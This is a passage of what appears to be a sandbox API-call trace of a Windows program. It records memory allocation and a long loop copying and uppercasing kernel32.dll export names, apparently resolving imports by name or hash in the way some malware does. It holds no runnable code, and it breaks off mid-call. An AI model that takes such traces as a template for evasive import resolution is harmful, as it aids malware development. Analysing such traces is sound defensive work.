lpOverlapped=0x0) returned 1 [0082.817] CloseHandle (hObject=0x0) returned 0 [0082.817] CloseHandle (hObject=0x438) returned 1 [0082.817] VirtualFree (lpAddress=0x10d0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0082.817] VirtualFree (lpAddress=0xfb0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0082.818] GetTickCount () returned 0x114d2da [0082.818] VirtualAlloc (lpAddress=0x0, dwSize=0x18, flAllocationType=0x3000, flProtect=0x4) returned 0xfb0000 [0082.818] lstrlenW (lpString="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890") returned 62 [0082.818] VirtualAlloc (lpAddress=0x0, dwSize=0xa, flAllocationType=0x3000, flProtect=0x4) returned 0xfc0000 [0082.818] VirtualAlloc (lpAddress=0x0, dwSize=0x7e, flAllocationType=0x3000, flProtect=0x4) returned 0x10d0000 [0082.818] lstrlenA (lpString="kernel32.dll") returned 12 [0082.819] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x76c20000 [0082.819] lstrcpyA (in: lpString1=0x3f2d468, lpString2="AcquireSRWLockExclusive" | out: lpString1="AcquireSRWLockExclusive") returned="AcquireSRWLockExclusive" [0082.819] lstrlenA (lpString="ACQUIRESRWLOCKEXCLUSIVE") returned 23 [0082.819] lstrcpyA (in: lpString1=0x3f2d468, lpString2="AcquireSRWLockShared" | out: lpString1="AcquireSRWLockShared") returned="AcquireSRWLockShared" [0082.819] lstrlenA (lpString="ACQUIRESRWLOCKSHARED") returned 20 [0082.819] lstrcpyA (in: lpString1=0x3f2d468, lpString2="ActivateActCtx" | out: lpString1="ActivateActCtx") returned="ActivateActCtx" [0082.819] lstrlenA (lpString="ACTIVATEACTCTX") returned 14 [0082.819] lstrcpyA (in: lpString1=0x3f2d468, lpString2="AddAtomA" | out: lpString1="AddAtomA") returned="AddAtomA" [0082.819] lstrlenA (lpString="ADDATOMA") returned 8 [0082.819] lstrcpyA (in: lpString1=0x3f2d468, lpString2="AddAtomW" | out: lpString1="AddAtomW") returned="AddAtomW" [0082.819] lstrlenA (lpString="ADDATOMW") returned 8 [0082.819] lstrcpyA (in: lpString1=0x3f2d468, lpString2="AddConsoleAliasA" | out: lpString1="AddConsoleAliasA") returned="AddConsoleAliasA" [0082.819] lstrlenA (lpString="ADDCONSOLEALIASA") returned 16 [0082.819] lstrcpyA (in: lpString1=0x3f2d468, lpString2="AddConsoleAliasW" | out: lpString1="AddConsoleAliasW") returned="AddConsoleAliasW" [0082.819] lstrlenA (lpString="ADDCONSOLEALIASW") returned 16 [0082.819] lstrcpyA (in: lpString1=0x3f2d468, lpString2="AddIntegrityLabelToBoundaryDescriptor" | out: lpString1="AddIntegrityLabelToBoundaryDescriptor") returned="AddIntegrityLabelToBoundaryDescriptor" [0082.819] lstrlenA (lpString="ADDINTEGRITYLABELTOBOUNDARYDESCRIPTOR") returned 37 [0082.819] lstrcpyA (in: lpString1=0x3f2d468, lpString2="AddLocalAlternateComputerNameA" | out: lpString1="AddLocalAlternateComputerNameA") returned="AddLocalAlternateComputerNameA" [0082.819] lstrlenA (lpString="ADDLOCALALTERNATECOMPUTERNAMEA") returned 30 [0082.819] lstrcpyA (in: lpString1=0x3f2d468, lpString2="AddLocalAlternateComputerNameW" | out: lpString1="AddLocalAlternateComputerNameW") returned="AddLocalAlternateComputerNameW" [0082.819] lstrlenA (lpString="ADDLOCALALTERNATECOMPUTERNAMEW") returned 30 [0082.819] lstrcpyA (in: lpString1=0x3f2d468, lpString2="AddRefActCtx" | out: lpString1="AddRefActCtx") returned="AddRefActCtx" [0082.819] lstrlenA (lpString="ADDREFACTCTX") returned 12 [0082.819] lstrcpyA (in: lpString1=0x3f2d468, lpString2="AddSIDToBoundaryDescriptor" | out: lpString1="AddSIDToBoundaryDescriptor") returned="AddSIDToBoundaryDescriptor" [0082.819] lstrlenA (lpString="ADDSIDTOBOUNDARYDESCRIPTOR") returned 26 [0082.819] lstrcpyA (in: lpString1=0x3f2d468, lpString2="AddSecureMemoryCacheCallback" | out: lpString1="AddSecureMemoryCacheCallback") returned="AddSecureMemoryCacheCallback" [0082.819] lstrlenA (lpString="ADDSECUREMEMORYCACHECALLBACK") returned 28 [0082.819] lstrcpyA (in: lpString1=0x3f2d468, lpString2="AddVectoredContinueHandler" | out: lpString1="AddVectoredContinueHandler") returned="AddVectoredContinueHandler" [0082.819] lstrlenA (lpString="ADDVECTOREDCONTINUEHANDLER") returned 26 [0082.819] lstrcpyA (in: lpString1=0x3f2d468, lpString2="AddVectoredExceptionHandler" | out: lpString1="AddVectoredExceptionHandler") returned="AddVectoredExceptionHandler" [0082.819] lstrlenA (lpString="ADDVECTOREDEXCEPTIONHANDLER") returned 27 [0082.819] lstrcpyA (in: lpString1=0x3f2d468, lpString2="AdjustCalendarDate" | out: lpString1="AdjustCalendarDate") returned="AdjustCalendarDate" [0082.819] lstrlenA (lpString="ADJUSTCALENDARDATE") returned 18 [0082.819] lstrcpyA (in: lpString1=0x3f2d468, lpString2="AllocConsole" | out: lpString1="AllocConsole") returned="AllocConsole" [0082.820] lstrlenA (lpString="ALLOCCONSOLE") returned 12 [0082.820] lstrcpyA (in: lpString1=0x3f2d468, lpString2="AllocateUserPhysicalPages" | out: lpString1="AllocateUserPhysicalPages") returned="AllocateUserPhysicalPages" [0082.820] lstrlenA (lpString="ALLOCATEUSERPHYSICALPAGES") returned 25 [0082.820] lstrcpyA (in: lpString1=0x3f2d468, lpString2="AllocateUserPhysicalPagesNuma" | out: lpString1="AllocateUserPhysicalPagesNuma") returned="AllocateUserPhysicalPagesNuma" [0082.820] lstrlenA (lpString="ALLOCATEUSERPHYSICALPAGESNUMA") returned 29 [0082.820] lstrcpyA (in: lpString1=0x3f2d468, lpString2="ApplicationRecoveryFinished" | out: lpString1="ApplicationRecoveryFinished") returned="ApplicationRecoveryFinished" [0082.820] lstrlenA (lpString="APPLICATIONRECOVERYFINISHED") returned 27 [0082.820] lstrcpyA (in: lpString1=0x3f2d468, lpString2="ApplicationRecoveryInProgress" | out: lpString1="ApplicationRecoveryInProgress") returned="ApplicationRecoveryInProgress" [0082.820] lstrlenA (lpString="APPLICATIONRECOVERYINPROGRESS") returned 29 [0082.820] lstrcpyA (in: lpString1=0x3f2d468, lpString2="AreFileApisANSI" | out: lpString1="AreFileApisANSI") returned="AreFileApisANSI" [0082.820] lstrlenA (lpString="AREFILEAPISANSI") returned 15 [0082.820] lstrcpyA (in: lpString1=0x3f2d468, lpString2="AssignProcessToJobObject" | out: lpString1="AssignProcessToJobObject") returned="AssignProcessToJobObject" [0082.820] lstrlenA (lpString="ASSIGNPROCESSTOJOBOBJECT") returned 24 [0082.820] lstrcpyA (in: lpString1=0x3f2d468, lpString2="AttachConsole" | out: lpString1="AttachConsole") returned="AttachConsole" [0082.820] lstrlenA (lpString="ATTACHCONSOLE") returned 13 [0082.820] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BackupRead" | out: lpString1="BackupRead") returned="BackupRead" [0082.820] lstrlenA (lpString="BACKUPREAD") returned 10 [0082.820] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BackupSeek" | out: lpString1="BackupSeek") returned="BackupSeek" [0082.820] lstrlenA (lpString="BACKUPSEEK") returned 10 [0082.820] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BackupWrite" | out: lpString1="BackupWrite") returned="BackupWrite" [0082.820] lstrlenA (lpString="BACKUPWRITE") returned 11 [0082.820] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BaseCheckAppcompatCache" | out: lpString1="BaseCheckAppcompatCache") returned="BaseCheckAppcompatCache" [0082.820] lstrlenA (lpString="BASECHECKAPPCOMPATCACHE") returned 23 [0082.820] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BaseCheckAppcompatCacheEx" | out: lpString1="BaseCheckAppcompatCacheEx") returned="BaseCheckAppcompatCacheEx" [0082.820] lstrlenA (lpString="BASECHECKAPPCOMPATCACHEEX") returned 25 [0082.820] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BaseCheckRunApp" | out: lpString1="BaseCheckRunApp") returned="BaseCheckRunApp" [0082.820] lstrlenA (lpString="BASECHECKRUNAPP") returned 15 [0082.820] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BaseCleanupAppcompatCacheSupport" | out: lpString1="BaseCleanupAppcompatCacheSupport") returned="BaseCleanupAppcompatCacheSupport" [0082.820] lstrlenA (lpString="BASECLEANUPAPPCOMPATCACHESUPPORT") returned 32 [0082.820] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BaseDllReadWriteIniFile" | out: lpString1="BaseDllReadWriteIniFile") returned="BaseDllReadWriteIniFile" [0082.820] lstrlenA (lpString="BASEDLLREADWRITEINIFILE") returned 23 [0082.820] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BaseDumpAppcompatCache" | out: lpString1="BaseDumpAppcompatCache") returned="BaseDumpAppcompatCache" [0082.820] lstrlenA (lpString="BASEDUMPAPPCOMPATCACHE") returned 22 [0082.820] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BaseFlushAppcompatCache" | out: lpString1="BaseFlushAppcompatCache") returned="BaseFlushAppcompatCache" [0082.820] lstrlenA (lpString="BASEFLUSHAPPCOMPATCACHE") returned 23 [0082.820] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BaseFormatObjectAttributes" | out: lpString1="BaseFormatObjectAttributes") returned="BaseFormatObjectAttributes" [0082.821] lstrlenA (lpString="BASEFORMATOBJECTATTRIBUTES") returned 26 [0082.821] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BaseFormatTimeOut" | out: lpString1="BaseFormatTimeOut") returned="BaseFormatTimeOut" [0082.821] lstrlenA (lpString="BASEFORMATTIMEOUT") returned 17 [0082.821] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BaseGenerateAppCompatData" | out: lpString1="BaseGenerateAppCompatData") returned="BaseGenerateAppCompatData" [0082.821] lstrlenA (lpString="BASEGENERATEAPPCOMPATDATA") returned 25 [0082.821] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BaseGetNamedObjectDirectory" | out: lpString1="BaseGetNamedObjectDirectory") returned="BaseGetNamedObjectDirectory" [0082.821] lstrlenA (lpString="BASEGETNAMEDOBJECTDIRECTORY") returned 27 [0082.821] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BaseInitAppcompatCacheSupport" | out: lpString1="BaseInitAppcompatCacheSupport") returned="BaseInitAppcompatCacheSupport" [0082.821] lstrlenA (lpString="BASEINITAPPCOMPATCACHESUPPORT") returned 29 [0082.821] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BaseIsAppcompatInfrastructureDisabled" | out: lpString1="BaseIsAppcompatInfrastructureDisabled") returned="BaseIsAppcompatInfrastructureDisabled" [0082.821] lstrlenA (lpString="BASEISAPPCOMPATINFRASTRUCTUREDISABLED") returned 37 [0082.821] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BaseQueryModuleData" | out: lpString1="BaseQueryModuleData") returned="BaseQueryModuleData" [0082.821] lstrlenA (lpString="BASEQUERYMODULEDATA") returned 19 [0082.821] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BaseSetLastNTError" | out: lpString1="BaseSetLastNTError") returned="BaseSetLastNTError" [0082.821] lstrlenA (lpString="BASESETLASTNTERROR") returned 18 [0082.821] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BaseThreadInitThunk" | out: lpString1="BaseThreadInitThunk") returned="BaseThreadInitThunk" [0082.821] lstrlenA (lpString="BASETHREADINITTHUNK") returned 19 [0082.821] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BaseUpdateAppcompatCache" | out: lpString1="BaseUpdateAppcompatCache") returned="BaseUpdateAppcompatCache" [0082.821] lstrlenA (lpString="BASEUPDATEAPPCOMPATCACHE") returned 24 [0082.821] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BaseVerifyUnicodeString" | out: lpString1="BaseVerifyUnicodeString") returned="BaseVerifyUnicodeString" [0082.821] lstrlenA (lpString="BASEVERIFYUNICODESTRING") returned 23 [0082.821] lstrcpyA (in: lpString1=0x3f2d468, lpString2="Basep8BitStringToDynamicUnicodeString" | out: lpString1="Basep8BitStringToDynamicUnicodeString") returned="Basep8BitStringToDynamicUnicodeString" [0082.821] lstrlenA (lpString="BASEP8BITSTRINGTODYNAMICUNICODESTRING") returned 37 [0082.821] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BasepAllocateActivationContextActivationBlock" | out: lpString1="BasepAllocateActivationContextActivationBlock") returned="BasepAllocateActivationContextActivationBlock" [0082.821] lstrlenA (lpString="BASEPALLOCATEACTIVATIONCONTEXTACTIVATIONBLOCK") returned 45 [0082.821] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BasepAnsiStringToDynamicUnicodeString" | out: lpString1="BasepAnsiStringToDynamicUnicodeString") returned="BasepAnsiStringToDynamicUnicodeString" [0082.821] lstrlenA (lpString="BASEPANSISTRINGTODYNAMICUNICODESTRING") returned 37 [0082.821] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BasepCheckAppCompat" | out: lpString1="BasepCheckAppCompat") returned="BasepCheckAppCompat" [0082.821] lstrlenA (lpString="BASEPCHECKAPPCOMPAT") returned 19 [0082.821] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BasepCheckBadapp" | out: lpString1="BasepCheckBadapp") returned="BasepCheckBadapp" [0082.821] lstrlenA (lpString="BASEPCHECKBADAPP") returned 16 [0082.821] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BasepCheckWinSaferRestrictions" | out: lpString1="BasepCheckWinSaferRestrictions") returned="BasepCheckWinSaferRestrictions" [0082.821] lstrlenA (lpString="BASEPCHECKWINSAFERRESTRICTIONS") returned 30 [0082.821] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BasepFreeActivationContextActivationBlock" | out: lpString1="BasepFreeActivationContextActivationBlock") returned="BasepFreeActivationContextActivationBlock" [0082.821] lstrlenA (lpString="BASEPFREEACTIVATIONCONTEXTACTIVATIONBLOCK") returned 41 [0082.821] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BasepFreeAppCompatData" | out: lpString1="BasepFreeAppCompatData") returned="BasepFreeAppCompatData" [0082.821] lstrlenA (lpString="BASEPFREEAPPCOMPATDATA") returned 22 [0082.822] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BasepMapModuleHandle" | out: lpString1="BasepMapModuleHandle") returned="BasepMapModuleHandle" [0082.822] lstrlenA (lpString="BASEPMAPMODULEHANDLE") returned 20 [0082.822] lstrcpyA (in: lpString1=0x3f2d468, lpString2="Beep" | out: lpString1="Beep") returned="Beep" [0082.822] lstrlenA (lpString="BEEP") returned 4 [0082.822] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BeginUpdateResourceA" | out: lpString1="BeginUpdateResourceA") returned="BeginUpdateResourceA" [0082.822] lstrlenA (lpString="BEGINUPDATERESOURCEA") returned 20 [0082.822] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BeginUpdateResourceW" | out: lpString1="BeginUpdateResourceW") returned="BeginUpdateResourceW" [0082.822] lstrlenA (lpString="BEGINUPDATERESOURCEW") returned 20 [0082.822] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BindIoCompletionCallback" | out: lpString1="BindIoCompletionCallback") returned="BindIoCompletionCallback" [0082.822] lstrlenA (lpString="BINDIOCOMPLETIONCALLBACK") returned 24 [0082.822] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BuildCommDCBA" | out: lpString1="BuildCommDCBA") returned="BuildCommDCBA" [0082.822] lstrlenA (lpString="BUILDCOMMDCBA") returned 13 [0082.822] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BuildCommDCBAndTimeoutsA" | out: lpString1="BuildCommDCBAndTimeoutsA") returned="BuildCommDCBAndTimeoutsA" [0082.822] lstrlenA (lpString="BUILDCOMMDCBANDTIMEOUTSA") returned 24 [0082.822] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BuildCommDCBAndTimeoutsW" | out: lpString1="BuildCommDCBAndTimeoutsW") returned="BuildCommDCBAndTimeoutsW" [0082.822] lstrlenA (lpString="BUILDCOMMDCBANDTIMEOUTSW") returned 24 [0082.822] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BuildCommDCBW" | out: lpString1="BuildCommDCBW") returned="BuildCommDCBW" [0082.822] lstrlenA (lpString="BUILDCOMMDCBW") returned 13 [0082.822] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CallNamedPipeA" | out: lpString1="CallNamedPipeA") returned="CallNamedPipeA" [0082.822] lstrlenA (lpString="CALLNAMEDPIPEA") returned 14 [0082.822] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CallNamedPipeW" | out: lpString1="CallNamedPipeW") returned="CallNamedPipeW" [0082.822] lstrlenA (lpString="CALLNAMEDPIPEW") returned 14 [0082.822] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CallbackMayRunLong" | out: lpString1="CallbackMayRunLong") returned="CallbackMayRunLong" [0082.822] lstrlenA (lpString="CALLBACKMAYRUNLONG") returned 18 [0082.822] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CancelDeviceWakeupRequest" | out: lpString1="CancelDeviceWakeupRequest") returned="CancelDeviceWakeupRequest" [0082.822] lstrlenA (lpString="CANCELDEVICEWAKEUPREQUEST") returned 25 [0082.822] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CancelIo" | out: lpString1="CancelIo") returned="CancelIo" [0082.822] lstrlenA (lpString="CANCELIO") returned 8 [0082.822] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CancelIoEx" | out: lpString1="CancelIoEx") returned="CancelIoEx" [0082.822] lstrlenA (lpString="CANCELIOEX") returned 10 [0082.822] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CancelSynchronousIo" | out: lpString1="CancelSynchronousIo") returned="CancelSynchronousIo" [0082.822] lstrlenA (lpString="CANCELSYNCHRONOUSIO") returned 19 [0082.822] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CancelThreadpoolIo" | out: lpString1="CancelThreadpoolIo") returned="CancelThreadpoolIo" [0082.822] lstrlenA (lpString="CANCELTHREADPOOLIO") returned 18 [0082.822] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CancelTimerQueueTimer" | out: lpString1="CancelTimerQueueTimer") returned="CancelTimerQueueTimer" [0082.822] lstrlenA (lpString="CANCELTIMERQUEUETIMER") returned 21 [0082.823] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CancelWaitableTimer" | out: lpString1="CancelWaitableTimer") returned="CancelWaitableTimer" [0082.823] lstrlenA (lpString="CANCELWAITABLETIMER") returned 19 [0082.823] lstrcpyA (in: lpString1=0x3f2d468, lpString2="ChangeTimerQueueTimer" | out: lpString1="ChangeTimerQueueTimer") returned="ChangeTimerQueueTimer" [0082.823] lstrlenA (lpString="CHANGETIMERQUEUETIMER") returned 21 [0082.823] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CheckElevation" | out: lpString1="CheckElevation") returned="CheckElevation" [0082.823] lstrlenA (lpString="CHECKELEVATION") returned 14 [0082.823] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CheckElevationEnabled" | out: lpString1="CheckElevationEnabled") returned="CheckElevationEnabled" [0082.823] lstrlenA (lpString="CHECKELEVATIONENABLED") returned 21 [0082.823] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CheckForReadOnlyResource" | out: lpString1="CheckForReadOnlyResource") returned="CheckForReadOnlyResource" [0082.823] lstrlenA (lpString="CHECKFORREADONLYRESOURCE") returned 24 [0082.823] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CheckNameLegalDOS8Dot3A" | out: lpString1="CheckNameLegalDOS8Dot3A") returned="CheckNameLegalDOS8Dot3A" [0082.823] lstrlenA (lpString="CHECKNAMELEGALDOS8DOT3A") returned 23 [0082.823] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CheckNameLegalDOS8Dot3W" | out: lpString1="CheckNameLegalDOS8Dot3W") returned="CheckNameLegalDOS8Dot3W" [0082.823] lstrlenA (lpString="CHECKNAMELEGALDOS8DOT3W") returned 23 [0082.823] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CheckRemoteDebuggerPresent" | out: lpString1="CheckRemoteDebuggerPresent") returned="CheckRemoteDebuggerPresent" [0082.823] lstrlenA (lpString="CHECKREMOTEDEBUGGERPRESENT") returned 26 [0082.823] lstrcpyA (in: lpString1=0x3f2d468, lpString2="ClearCommBreak" | out: lpString1="ClearCommBreak") returned="ClearCommBreak" [0082.823] lstrlenA (lpString="CLEARCOMMBREAK") returned 14 [0082.823] lstrcpyA (in: lpString1=0x3f2d468, lpString2="ClearCommError" | out: lpString1="ClearCommError") returned="ClearCommError" [0082.823] lstrlenA (lpString="CLEARCOMMERROR") returned 14 [0082.823] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CloseConsoleHandle" | out: lpString1="CloseConsoleHandle") returned="CloseConsoleHandle" [0082.823] lstrlenA (lpString="CLOSECONSOLEHANDLE") returned 18 [0082.823] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CloseHandle" | out: lpString1="CloseHandle") returned="CloseHandle" [0082.823] lstrlenA (lpString="CLOSEHANDLE") returned 11 [0082.823] lstrcpyA (in: lpString1=0x3f2d468, lpString2="ClosePrivateNamespace" | out: lpString1="ClosePrivateNamespace") returned="ClosePrivateNamespace" [0082.823] lstrlenA (lpString="CLOSEPRIVATENAMESPACE") returned 21 [0082.823] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CloseProfileUserMapping" | out: lpString1="CloseProfileUserMapping") returned="CloseProfileUserMapping" [0082.823] lstrlenA (lpString="CLOSEPROFILEUSERMAPPING") returned 23 [0082.823] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CloseThreadpool" | out: lpString1="CloseThreadpool") returned="CloseThreadpool" [0082.823] lstrlenA (lpString="CLOSETHREADPOOL") returned 15 [0082.823] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CloseThreadpoolCleanupGroup" | out: lpString1="CloseThreadpoolCleanupGroup") returned="CloseThreadpoolCleanupGroup" [0082.823] lstrlenA (lpString="CLOSETHREADPOOLCLEANUPGROUP") returned 27 [0082.823] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CloseThreadpoolCleanupGroupMembers" | out: lpString1="CloseThreadpoolCleanupGroupMembers") returned="CloseThreadpoolCleanupGroupMembers" [0082.823] lstrlenA (lpString="CLOSETHREADPOOLCLEANUPGROUPMEMBERS") returned 34 [0082.823] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CloseThreadpoolIo" | out: lpString1="CloseThreadpoolIo") returned="CloseThreadpoolIo" [0082.823] lstrlenA (lpString="CLOSETHREADPOOLIO") returned 17 [0082.823] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CloseThreadpoolTimer" | out: lpString1="CloseThreadpoolTimer") returned="CloseThreadpoolTimer" [0082.824] lstrlenA (lpString="CLOSETHREADPOOLTIMER") returned 20 [0082.824] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CloseThreadpoolWait" | out: lpString1="CloseThreadpoolWait") returned="CloseThreadpoolWait" [0082.824] lstrlenA (lpString="CLOSETHREADPOOLWAIT") returned 19 [0082.824] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CloseThreadpoolWork" | out: lpString1="CloseThreadpoolWork") returned="CloseThreadpoolWork" [0082.824] lstrlenA (lpString="CLOSETHREADPOOLWORK") returned 19 [0082.824] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CmdBatNotification" | out: lpString1="CmdBatNotification") returned="CmdBatNotification" [0082.824] lstrlenA (lpString="CMDBATNOTIFICATION") returned 18 [0082.824] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CommConfigDialogA" | out: lpString1="CommConfigDialogA") returned="CommConfigDialogA" [0082.824] lstrlenA (lpString="COMMCONFIGDIALOGA") returned 17 [0082.824] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CommConfigDialogW" | out: lpString1="CommConfigDialogW") returned="CommConfigDialogW" [0082.824] lstrlenA (lpString="COMMCONFIGDIALOGW") returned 17 [0082.824] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CompareCalendarDates" | out: lpString1="CompareCalendarDates") returned="CompareCalendarDates" [0082.824] lstrlenA (lpString="COMPARECALENDARDATES") returned 20 [0082.824] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CompareFileTime" | out: lpString1="CompareFileTime") returned="CompareFileTime" [0082.824] lstrlenA (lpString="COMPAREFILETIME") returned 15 [0082.824] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CompareStringA" | out: lpString1="CompareStringA") returned="CompareStringA" [0082.824] lstrlenA (lpString="COMPARESTRINGA") returned 14 [0082.824] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CompareStringEx" | out: lpString1="CompareStringEx") returned="CompareStringEx" [0082.824] lstrlenA (lpString="COMPARESTRINGEX") returned 15 [0082.824] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CompareStringOrdinal" | out: lpString1="CompareStringOrdinal") returned="CompareStringOrdinal" [0082.824] lstrlenA (lpString="COMPARESTRINGORDINAL") returned 20 [0082.824] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CompareStringW" | out: lpString1="CompareStringW") returned="CompareStringW" [0082.824] lstrlenA (lpString="COMPARESTRINGW") returned 14 [0082.824] lstrcpyA (in: lpString1=0x3f2d468, lpString2="ConnectNamedPipe" | out: lpString1="ConnectNamedPipe") returned="ConnectNamedPipe" [0082.824] lstrlenA (lpString="CONNECTNAMEDPIPE") returned 16 [0082.824] lstrcpyA (in: lpString1=0x3f2d468, lpString2="ConsoleMenuControl" | out: lpString1="ConsoleMenuControl") returned="ConsoleMenuControl" [0082.824] lstrlenA (lpString="CONSOLEMENUCONTROL") returned 18 [0082.824] lstrcpyA (in: lpString1=0x3f2d468, lpString2="ContinueDebugEvent" | out: lpString1="ContinueDebugEvent") returned="ContinueDebugEvent" [0082.824] lstrlenA (lpString="CONTINUEDEBUGEVENT") returned 18 [0082.824] lstrcpyA (in: lpString1=0x3f2d468, lpString2="ConvertCalDateTimeToSystemTime" | out: lpString1="ConvertCalDateTimeToSystemTime") returned="ConvertCalDateTimeToSystemTime" [0082.824] lstrlenA (lpString="CONVERTCALDATETIMETOSYSTEMTIME") returned 30 [0082.824] lstrcpyA (in: lpString1=0x3f2d468, lpString2="ConvertDefaultLocale" | out: lpString1="ConvertDefaultLocale") returned="ConvertDefaultLocale" [0082.824] lstrlenA (lpString="CONVERTDEFAULTLOCALE") returned 20 [0082.824] lstrcpyA (in: lpString1=0x3f2d468, lpString2="ConvertFiberToThread" | out: lpString1="ConvertFiberToThread") returned="ConvertFiberToThread" [0082.824] lstrlenA (lpString="CONVERTFIBERTOTHREAD") returned 20 [0082.824] lstrcpyA (in: lpString1=0x3f2d468, lpString2="ConvertNLSDayOfWeekToWin32DayOfWeek" | out: lpString1="ConvertNLSDayOfWeekToWin32DayOfWeek") returned="ConvertNLSDayOfWeekToWin32DayOfWeek" [0082.825] lstrlenA (lpString="CONVERTNLSDAYOFWEEKTOWIN32DAYOFWEEK") returned 35 [0082.825] lstrcpyA (in: lpString1=0x3f2d468, lpString2="ConvertSystemTimeToCalDateTime" | out: lpString1="ConvertSystemTimeToCalDateTime") returned="ConvertSystemTimeToCalDateTime" [0082.825] lstrlenA (lpString="CONVERTSYSTEMTIMETOCALDATETIME") returned 30 [0082.825] lstrcpyA (in: lpString1=0x3f2d468, lpString2="ConvertThreadToFiber" | out: lpString1="ConvertThreadToFiber") returned="ConvertThreadToFiber" [0082.825] lstrlenA (lpString="CONVERTTHREADTOFIBER") returned 20 [0082.825] lstrcpyA (in: lpString1=0x3f2d468, lpString2="ConvertThreadToFiberEx" | out: lpString1="ConvertThreadToFiberEx") returned="ConvertThreadToFiberEx" [0082.825] lstrlenA (lpString="CONVERTTHREADTOFIBEREX") returned 22 [0082.825] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CopyContext" | out: lpString1="CopyContext") returned="CopyContext" [0082.825] lstrlenA (lpString="COPYCONTEXT") returned 11 [0082.825] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CopyFileA" | out: lpString1="CopyFileA") returned="CopyFileA" [0082.825] lstrlenA (lpString="COPYFILEA") returned 9 [0082.825] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CopyFileExA" | out: lpString1="CopyFileExA") returned="CopyFileExA" [0082.825] lstrlenA (lpString="COPYFILEEXA") returned 11 [0082.825] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CopyFileExW" | out: lpString1="CopyFileExW") returned="CopyFileExW" [0082.825] lstrlenA (lpString="COPYFILEEXW") returned 11 [0082.825] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CopyFileTransactedA" | out: lpString1="CopyFileTransactedA") returned="CopyFileTransactedA" [0082.825] lstrlenA (lpString="COPYFILETRANSACTEDA") returned 19 [0082.825] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CopyFileTransactedW" | out: lpString1="CopyFileTransactedW") returned="CopyFileTransactedW" [0082.825] lstrlenA (lpString="COPYFILETRANSACTEDW") returned 19 [0082.825] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CopyFileW" | out: lpString1="CopyFileW") returned="CopyFileW" [0082.825] lstrlenA (lpString="COPYFILEW") returned 9 [0082.825] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CopyLZFile" | out: lpString1="CopyLZFile") returned="CopyLZFile" [0082.825] lstrlenA (lpString="COPYLZFILE") returned 10 [0082.825] lstrcpyA (in: lpString1=0x3f2d468, 